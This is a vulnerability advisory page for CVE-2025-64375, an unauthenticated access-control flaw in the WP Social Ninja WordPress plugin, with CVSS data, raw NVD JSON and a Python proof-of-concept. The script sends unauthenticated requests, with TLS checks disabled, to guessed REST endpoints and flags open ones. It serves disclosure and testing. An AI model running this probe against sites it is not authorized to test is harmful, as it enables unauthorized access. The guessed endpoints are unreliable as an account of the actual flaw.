Security Vulnerability Report
中文
CVE-2025-64375 CVSS 6.5 MEDIUM

CVE-2025-64375

Published: 2025-12-18 08:16:15
Last Modified: 2026-04-27 16:16:42

Description

Missing Authorization vulnerability in Mahmudul Hasan Arif WP Social Ninja wp-social-reviews allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP Social Ninja: from n/a through <= 3.20.1.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L

Configurations (Affected Products)

No configuration data available.

WP Social Ninja <= 3.20.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-64375 PoC - Missing Authorization in WP Social Ninja # Target: WordPress site with WP Social Ninja plugin <= 3.20.1 def check_vulnerability(target_url): """ Check if target is vulnerable to CVE-2025-64375 This PoC attempts to access protected endpoints without authentication """ # Common WordPress plugin endpoints endpoints = [ '/wp-json/wp-social-ninja/v1/settings', '/wp-json/wp-social-ninja/v1/reviews', '/wp-json/wp-social-ninja/v1/feeds', '/?rest_route=/wp-social-ninja/v1/settings', '/?rest_route=/wp-social-ninja/v1/reviews' ] print(f"[*] Testing target: {target_url}") print(f"[*] CVE-2025-64375 - Missing Authorization in WP Social Ninja") for endpoint in endpoints: url = target_url.rstrip('/') + endpoint print(f"\n[*] Testing endpoint: {endpoint}") try: # Send unauthenticated request response = requests.get(url, timeout=10, verify=False) print(f"[+] Status Code: {response.status_code}") if response.status_code == 200: print(f"[!] VULNERABLE - Endpoint accessible without authentication") print(f"[+] Response preview: {response.text[:200]}") return True elif response.status_code == 401 or response.status_code == 403: print(f"[-] Protected - Authentication required") else: print(f"[-] Status: {response.status_code}") except requests.RequestException as e: print(f"[-] Error: {e}") print("\n[*] Note: Manual testing may be required as endpoints vary") return False if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-64375-poc.py <target_url>") print("Example: python cve-2025-64375-poc.py http://example.com") sys.exit(1) target = sys.argv[1] check_vulnerability(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64375", "sourceIdentifier": "[email protected]", "published": "2025-12-18T08:16:14.510", "lastModified": "2026-04-27T16:16:42.113", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Mahmudul Hasan Arif WP Social Ninja wp-social-reviews allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP Social Ninja: from n/a through <= 3.20.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/wp-social-reviews/vulnerability/wordpress-wp-social-ninja-plugin-3-20-1-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}